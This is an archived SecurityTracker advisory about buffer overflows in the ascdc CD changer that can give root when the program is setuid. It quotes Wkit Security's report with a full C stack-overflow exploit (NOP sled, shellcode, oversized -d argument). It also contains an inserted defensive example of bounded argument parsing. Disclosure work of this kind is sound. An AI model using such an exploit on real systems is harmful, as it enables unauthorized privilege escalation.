SecurityTracker.com
SecurityTracker
Archives
Category:   Application (Generic)  >   AfterStep CD Changer (ascdc) Vendors:   Malda, Rob
AfterStep CD Changer for Linux/Unix Can Give Elevated Privileges (Possibly Root Privileges) to Local Users
SecurityTracker Alert ID:  1001063
SecurityTracker URL:  http://securitytracker.com/id/1001063
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 12 2001
Impact:   Root access via local system, User access via local system
Exploit Included:  Yes  
Version(s): ascdc-0.3
Description:   Wkit Security reports that there are multiple buffer overflows in the AfterStep CD Changer (ascdc) application that can be used to obtain elevated privileges, depending on how the application is configured.

These vulnerabilities can potentially be used to obtain root if the application is installed setuid root. Although ascdc is not installed setuid root by default, it is required to be run as root or installed setuid to be able to use the automounting feature.

Demonstration exploit code using the "-d" option is contained in the original report. Apparently, buffer overflows also exist in the "-m" and "-c" switches.

Impact:   An authorized local user could obtain elevated privileges if the application is installed to be setuid root.
Solution:   No solution was available at the time of this entry.
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Re: AfterStep CD Changer for Linux/Unix Can Give Elevated Privileges (Possibly Root Privileges) to Local Users
This is a follow-up message. The author includes demonstration exploit code using the "-c" switch.
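As an added example from the defender's side, not code from the advisory or from ascdc itself: the hardened form of the pattern the report describes, an option argument copied into a fixed-size buffer, with the copy refused when it would not fit. The buffer size, the function names, and the assumption that -d, -m and -c each take exactly one argument are mine; the advisory does not show ascdc's source.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size of the fixed buffer an option argument lands in; the
 * advisory does not state the size ascdc actually used. */
#define OPT_BUFSZ 64

/* Bounded copy of one option argument. Refuses anything that would not
 * fit together with its terminating NUL, leaves dest untouched on failure
 * and never scans src further than destsz bytes.
 * Returns 0 on success, -1 if src is missing or too long. */
int copy_option_arg(char *dest, size_t destsz, const char *src)
{
    size_t n;
    if (src == NULL || destsz == 0)
        return -1;
    for (n = 0; n < destsz; n++)
        if (src[n] == '\0')
            break;
    if (n == destsz)            /* no NUL within destsz: too long */
        return -1;
    memcpy(dest, src, n + 1);
    return 0;
}

/* Walks argv for the three switches the advisory names (-d, -m, -c),
 * assuming each takes one argument. An oversize argument makes the parser
 * fail closed instead of overflowing; a setuid program should then exit.
 * Returns 0 on success, -1 on an unknown or incomplete switch,
 * -2 on an argument that does not fit. */
int parse_ascdc_args(int argc, char *argv[], char optd[OPT_BUFSZ],
                     char optm[OPT_BUFSZ], char optc[OPT_BUFSZ])
{
    int i;
    optd[0] = optm[0] = optc[0] = '\0';
    for (i = 1; i < argc; i++) {
        char *target;
        if (strcmp(argv[i], "-d") == 0)      target = optd;
        else if (strcmp(argv[i], "-m") == 0) target = optm;
        else if (strcmp(argv[i], "-c") == 0) target = optc;
        else                                 return -1;
        if (i + 1 >= argc)                   /* switch without its argument */
            return -1;
        if (copy_option_arg(target, OPT_BUFSZ, argv[++i]) != 0)
            return -2;
    }
    return 0;
}
```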



Source Message Contents

Subject:  ascdc Buffer Overflow Vulnerability


TITLE:          ascdc Buffer Overflow Vulnerability
ADVISORY ID:    WSIR-01/02-06
CONTACT:        advisories@wkit.com, Wkit Security AB
CLASS:          Buffer Overflow
OBJECT:         ascdc (exec)
VENDOR:         Rob Malda (http://www.CmdrTaco.net)
REMOTE:         No
LOCAL:          Yes
VULNERABLE:     ascdc-0.3


DESCRIPTION (from ascdc README)
Use this bad boy to swap CD's graphically under X. I really
got sick of using the Command Line to do this- under that *other*
OS I get a nice little clickable thing to do it.

VULNERABILITY:
There are multiple buffer overflows in ascdc that can be exploited to gain
root if it is installed setuid root. It is NOT installed setuid root by
default but as the README says "If you intend to use the automounting feature,
you must either run ascdc as root, or setuid it".

I use the -d option in the exploit but overflows also exist in the -m & -c
switches.


Exploit:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Payload: write(1, msg, 0x50) followed by exit(0). It only prints the
 * message embedded below; it does not spawn a shell. */
char shellcode[]="\xeb\x15\x59\x31\xc0\x31\xdb\x31\xd2\xb0"
           "\x04\xb3\x01\xb2\x50\xcd\x80\x31\xc0\xb0"
           "\x01\xcd\x80\xe8\xe6\xff\xff\xff"
           "Would you like to play a game? y\x0aStrange, the only winning "
           "move is not to play.\x0a";
#define bsize 600

/* Returns the current stack pointer. i386-only inline asm: the value is
 * left in %eax, the return register on that ABI. */
unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int i;
  buff = malloc(bsize);
  if (buff == NULL)
    return 1;

  /* fill the whole buffer with the current stack address */
  addr = get_sp();
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  /* first half becomes a run of 0x90 (nop) bytes */
  for (i = 0; i < bsize/2; i++)
    buff[i] = 0x90;

  /* place the payload in the middle and NUL-terminate the argument */
  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];
  buff[bsize - 1] = '\0';

  /* pass the oversized argument to the -d switch */
  execlp("/usr/X11R6/bin/ascdc","ascdc","-d",buff,(char *)NULL);
  perror("execlp");
  return 1;
}


SOLUTION/VENDOR INFORMATION/WORKAROUND
No information available


CREDITS

Other advisories from Wkit Security AB can be obtained from:
http://www.wkit.com/advisories/


DISCLAIMER
The contents of this advisory are copyright (c) 2001 Wkit Security AB and
may be distributed freely, provided that no fee is charged and proper
credit is given. Wkit Security AB takes no credit for this discovery if
someone else has published this information in the public domain before
this advisory was released.
The information herein is intended for educational purposes, not for
malicious use. Wkit Security AB takes no responsibility whatsoever for the
use of this information.


ABOUT THE COMPANY
Wkit Security AB is an independent data security company working with
security-related services and products. Wkit Security AB plays a leading
role in the development of security thinking regarding internal and
external data communication at companies and other organizations that
store sensitive information.
The company consists of two divisions: a service division, performing
security analysis and security reviews, and a product division. We work
together with strategic partners to bring programs and services to the
market.
Our services and products are continuously developed to follow the world
demand for IT security as closely as possible.


30 DAY DISCLOSURE
Whenever Wkit Security AB finds any security-related flaws in an operating
system or application, we will provide the vendor responsible for the
product with a detailed Incident Report. We believe that 30 days is
appropriate for the vendor to fix the problem before we publish the
incident report on our own web page and on other mailing lists/websites we
find suitable for the majority of worldwide users. If the vendor has a
reasonable cause why they cannot fix the problem in 30 days we can, after
discussion, agree on a longer disclosure time.


ACKNOWLEDGEMENTS
Wkit Security AB's highest priority is public security, and it will
never release Incident Reports without informing the vendor and giving them
a reasonable (30 day) time to fix the problem. In general, Wkit Security AB
follows the guidelines for reporting security breaches found on the
vendor's homepage or similar.
We urge vendors, in the same way that we follow their guidelines, to
inform us about the solution, if possible 2 days before the
fix/solution is presented to the majority. This gives us the chance
to prepare our web page to inform about the Incident and to present a
solution in the way the vendor suggests at the time it is presented to
the majority.


CONTACT
Wkit Security AB should be contacted through advisories@wkit.com if no
other agreement has been made. Every incident report is assigned a report
number WSIR-xx/xx-xx (Wkit Security AB Incident Report) and one
responsible contact person from Wkit Security. When communicating with
Wkit Security AB in the matter of the Incident Reports, be sure to include the
WSIR number in the email to avoid any problems.


***************************************************************************
Wkit Security AB
SWEDEN

http://www.wkit.com
e-mail: advisories@wkit.com
***************************************************************************





Copyright 2021, SecurityGlobal.net LLC